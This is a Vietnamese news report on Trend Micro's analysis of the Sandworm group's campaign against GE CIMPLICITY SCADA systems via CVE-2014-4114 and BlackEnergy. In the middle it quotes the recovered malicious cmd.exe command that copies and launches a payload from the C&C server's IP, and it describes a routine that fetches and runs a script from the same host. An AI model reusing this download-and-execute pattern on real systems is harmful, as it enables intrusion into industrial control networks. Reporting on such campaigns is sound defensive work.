Nhóm tin tặc Sandworm nhắm mục tiêu đến hệ thống SCADA
Các nhà nghiên cứu tại Trend Micro cho biết nhóm tin tặc Sandworm đã để mắt tới việc xâm nhập những hệ thống điều khiển giám sát và thu thập dữ liệu (SCADA – supervisory control and data acquisition). Hệ thống SCADA được sử dụng để điều khiển trong sản xuất công nghiệp. Tuần trước, ...
Các nhà nghiên cứu tại Trend Micro cho biết nhóm tin tặc Sandworm đã để mắt tới việc xâm nhập những hệ thống điều khiển giám sát và thu thập dữ liệu (SCADA – supervisory control and data acquisition).
Hệ thống SCADA được sử dụng để điều khiển trong sản xuất công nghiệp. Tuần trước, Sandworm đã bị phát hiện trong một cuộc tấn công sử dụng lỗ hổng zero-day (CVE-2014-4114) trên Windows bởi các nhà nghiên cứu tại iSight Partners. Sau khi bắt đầu điều tra những mẫu phần mềm độc hại và tên miền kết nối của chúng, trendmicro đã nhanh chóng nhận ra rằng nhóm tin tặc này dường như nhắm đến các trung tâm SCADA đang sử dụng giải pháp CIMPLICITY HMI của công ty GE Intelligent Platform. Chúng tôi đã quan sát nhóm tin tặc này sử dụng tệp tin .cim và .bcl trong các cuộc tấn công, cả hai loại đều được sử dụng trong phần mềm CIMPLICITY HMI. Một bằng chứng nữa của việc mã độc nhắm đến CIMPILICITY là nó đã thả mã độc vào địa chỉ cài đặt CIMPLICITY thông qua biến môi trường %CIMPATH% trên máy nạn nhân.
Trend Macro đã theo dõi tin tặc sử dụng email cùng với một tệp tin độc hại đính kèm mở bằng phần mềm CIMPLICITY và cố gắng khai thác lỗ hổng CVE-2014-4114 trên Windows. Nếu thành công, nó sẽ tiếp tục tải về malware Black Energy lên hệ thống. Một trong những máy chủ C & C bị phát hiện bởi TrendMicro đang hoạt ododngj tại 94.185.85.122. Họ đã lấy được một tập tin config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e). Đây là một file CimEdit/CimView, một đối tượng do phần mềm GE’s Cimplicity SCADA sinh ra và sử dụng bởi thiết bị quản lí SCADA.
Trong config.bak có hai lệnh là OnOpenExecCommand và ScreenOpenDispatch. Phân tích OnOpenExecCommand sẽ được dòng một mã lệnh:
cmd.exe /c “copy 94[.]185[.]85[.]122publicdefault.txt “%CIMPATH%CimCMSafegs.exe” && start “WOW64” “%CIMPATH%CimCMSafegs.exe”
Điều đáng chú ý là biến môi trường %CIMPATH% được sử dụng để chứa địa chỉ của default.txt. Đây là biến chuẩn của Cimplicity khi cài đặt. Lệnh ScreenOpenDispatch khởi động chương trình con tải tệp tin từ http://94.185.85.122/newsfeed.xml, lưu trữ và thực thi bằng cscript.exe, xóa sau khi thực thi và kết thúc tiến trình hiện tại.
Hiện tại các máy chủ C & C đã ngừng hoạt động.
Các nhà nghiên cứu lưu ý rằng mặc dùng họ thấy CIMPLICITY đang được sử dụng như một phương thức tấn công nhưng chưa có dấu hiệu nào cho thấy tin tặc thao tác trên hệ thống hay dữ liệu SCADA. CVE-2014-4114 đã được vá bởi Microsoft trong tháng này với bản vá MS14-060.
Securityweek
